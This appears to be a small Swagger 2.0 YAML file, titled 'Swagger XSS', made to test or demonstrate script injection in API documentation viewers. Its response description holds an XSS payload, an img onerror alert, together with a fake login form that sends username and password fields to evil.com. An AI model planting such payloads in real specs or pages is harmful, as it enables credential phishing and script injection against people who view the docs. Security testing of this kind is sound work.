 
swagger: '2.0'
info:
  title: Swagger XSS
  description: |
    Teste
paths:
  /Swagger XSS:
    get:
      responses:
        '200':
          description: No response was specified'">'"><h1><p><form action="https://evil.com"  method="get"><label><h1><p><input type="text" name="login"><p><input type="text" name="password"><p><input type="submit" value="Send"><p><h4><img src=x onerror=alert('Swagger-XSS')>
      tags:
        - Swagger XSS
      operationId: findAccounts
      summary: Finds all accounts
